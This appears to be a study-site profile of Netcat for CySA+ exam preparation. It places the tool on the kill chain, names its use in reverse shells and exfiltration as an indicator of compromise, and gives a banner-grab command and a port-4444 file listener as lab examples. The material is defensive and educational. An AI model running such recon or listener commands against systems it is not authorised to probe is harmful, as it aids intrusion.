Thiago Teixeira
EN | PT

Netcat

Nmap Project / Hobbit

The "Swiss army knife" of TCP/IP — banner grabbing, port listening, file transfer, reverse shells.

Network Recon & Monitoring Free & Open Source CLI Learning Cross-platform
Homepage Docs

Cyber Kill Chain & Defender Lifecycle

Attacker — Kill Chain
1 Reconnaissance
2 Weaponization
3 Delivery
4 Exploitation
5 Installation
6 Command & Control
7 Actions on Objectives
Defender — IR Lifecycle
8 Detection / Monitoring
9 Containment & Eradication
10 Post-incident Forensics

Description

Netcat (nc) is a tiny utility that reads and writes data across network connections. Both attackers and defenders use it. A CySA+ analyst must recognise its presence on a host because Netcat is a classic indicator of compromise — frequently used for reverse shells, bind shells, port relays, and ad-hoc data exfiltration.

Common defensive uses: banner grabbing, quick port listeners for firewall testing, simple file transfers across DMZs.

Variants you may see on the exam: nc, ncat (Nmap), socat, BSD vs GNU implementations (-e execve flag is often stripped on hardened distros — for good reason).

Use cases

  • Grabbing a service banner during triage
  • Spinning up a quick listener to validate ACLs
  • Recognising reverse-shell command-line patterns in EDR alerts
  • Transferring evidence files off a forensic VM in a controlled lab

Example

# Banner grab
nc -nv 10.10.10.5 22

# Listener that pipes input into a file (defender lab)
nc -lvnp 4444 > /tmp/incoming.bin